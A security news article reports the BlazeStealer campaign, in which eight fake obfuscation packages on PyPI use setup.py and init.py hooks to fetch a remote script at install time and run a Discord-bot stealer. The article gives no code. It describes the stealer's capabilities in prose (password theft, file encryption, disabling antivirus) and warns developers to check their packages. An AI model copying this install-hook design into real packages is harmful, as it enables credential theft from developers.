BlazeStealer Malware Alert for Python Developers: Check Your Packages

A recent discovery has revealed a new set of malicious Python packages that have infiltrated the Python Package Index (PyPI) repository, with the primary objective of extracting sensitive information from compromised developer systems.

These deceitful packages pose as apparently harmless obfuscation tools but contain a malicious component known as BlazeStealer, as reported by Checkmarx.

BlazeStealer operates by retrieving an additional malevolent script from an external source, which then empowers a Discord bot, granting attackers full control over the victim’s computer, according to Yehuda Gelb, a security researcher.

This malicious campaign began in January 2023 and encompasses a total of eight packages: Pyobftoexe, Pyobfusfile, Pyobfexecute, Pyobfpremium, Pyobflite, Pyobfadvance, Pyobfuse, and pyobfgood. The last of these, pyobfgood, was published in October.

Each of these modules contains setup.py and init.py files specifically designed to retrieve a Python script hosted on transfer[.]sh, which is executed immediately upon installation.

BlazeStealer, the malware within these packages, operates as a Discord bot, enabling the threat actor to harvest a broad range of information. This includes extracting passwords from web browsers, capturing screenshots, executing arbitrary commands, encrypting files, and disabling Microsoft Defender Antivirus on the compromised host.

Furthermore, it has the capacity to render the victim’s computer inoperable by increasing CPU usage, adding a Windows Batch script to the startup directory for system shutdown, and even inducing a blue screen of death (BSoD) error.

Yehuda Gelb emphasized that developers involved in code obfuscation typically handle valuable and sensitive information, making them attractive targets for hackers.

A significant number of downloads associated with these malicious packages originated in the United States, followed by China, Russia, Ireland, Hong Kong, Croatia, France, and Spain. These packages were downloaded a total of 2,438 times before they were eventually removed.

Gelb underscored the importance of caution in the open-source domain, advising developers to exercise vigilance and thoroughly assess packages before incorporating them into their projects.